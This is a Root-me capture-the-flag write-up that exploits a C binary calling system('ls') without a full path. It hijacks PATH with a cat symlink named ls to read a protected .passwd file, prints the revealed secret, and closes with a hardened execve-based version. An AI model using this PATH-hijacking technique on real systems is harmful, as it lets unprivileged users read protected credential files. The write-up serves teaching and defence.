Root-me.org

Bash - System 1

Try to find your path padawan !

A different type of challenge: in this one we need to find a way to read .passwd. We also have access to the source code of the binary.

#include <stdlib.h>
#include <stdio.h>
 
/* gcc -m32 -o ch11 ch11.c */
 
int main(void) 
{
	system("ls /challenge/app-script/ch11/.passwd"); 
	return 0;
}

This breaks a basic rule: always use the full path to a command when you write a script. system() hands the string to the shell, which looks up ls through the PATH environment variable, and we control that variable.

We can abuse this by changing PATH and creating a symlink to cat named ls. We'll put our new directory before the other paths.

Since the code runs ls on the file we want to read, this change should get us its content.

app-script-ch11@challenge02:~$ mkdir -p /tmp/custom/
app-script-ch11@challenge02:~$ ln -s /bin/cat /tmp/custom/ls
app-script-ch11@challenge02:~$ export PATH=/tmp/custom:$PATH
app-script-ch11@challenge02:~$ ./ch11
!oPe96a/.s8d5
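
For comparison, a hardened variant of the challenge program, added here as an example (it is not the challenge's code): it runs ls by absolute path through execve() with a fixed environment, so the caller's PATH is never consulted. The helper name run_fixed and the contents of safe_env are assumptions made for this sketch.

```c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical helper: run an absolute-path program with a fixed, minimal
 * environment. No shell is involved and the caller's PATH is ignored.
 * Returns the child's exit status, or -1 on error. */
int run_fixed(const char *abs_path, char *const argv[])
{
    /* Environment handed to the child; nothing is inherited from the caller. */
    static char *const safe_env[] = { "PATH=/usr/bin:/bin", "LC_ALL=C", NULL };
    pid_t pid;
    int status;

    /* Refuse anything that would need a PATH lookup to resolve. */
    if (abs_path == NULL || abs_path[0] != '/')
        return -1;

    pid = fork();
    if (pid < 0)
        return -1;

    if (pid == 0) {
        /* execve() takes the path literally, unlike system() or execvp(). */
        execve(abs_path, argv, safe_env);
        perror("execve");
        _exit(127);
    }

    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Same command as the challenge source, with ls given by full path. */
    char *const args[] = { "ls", "/challenge/app-script/ch11/.passwd", NULL };
    return run_fixed("/bin/ls", args);
}
```

With this version, prepending /tmp/custom to PATH has no effect, because /bin/ls is executed directly rather than resolved by the shell.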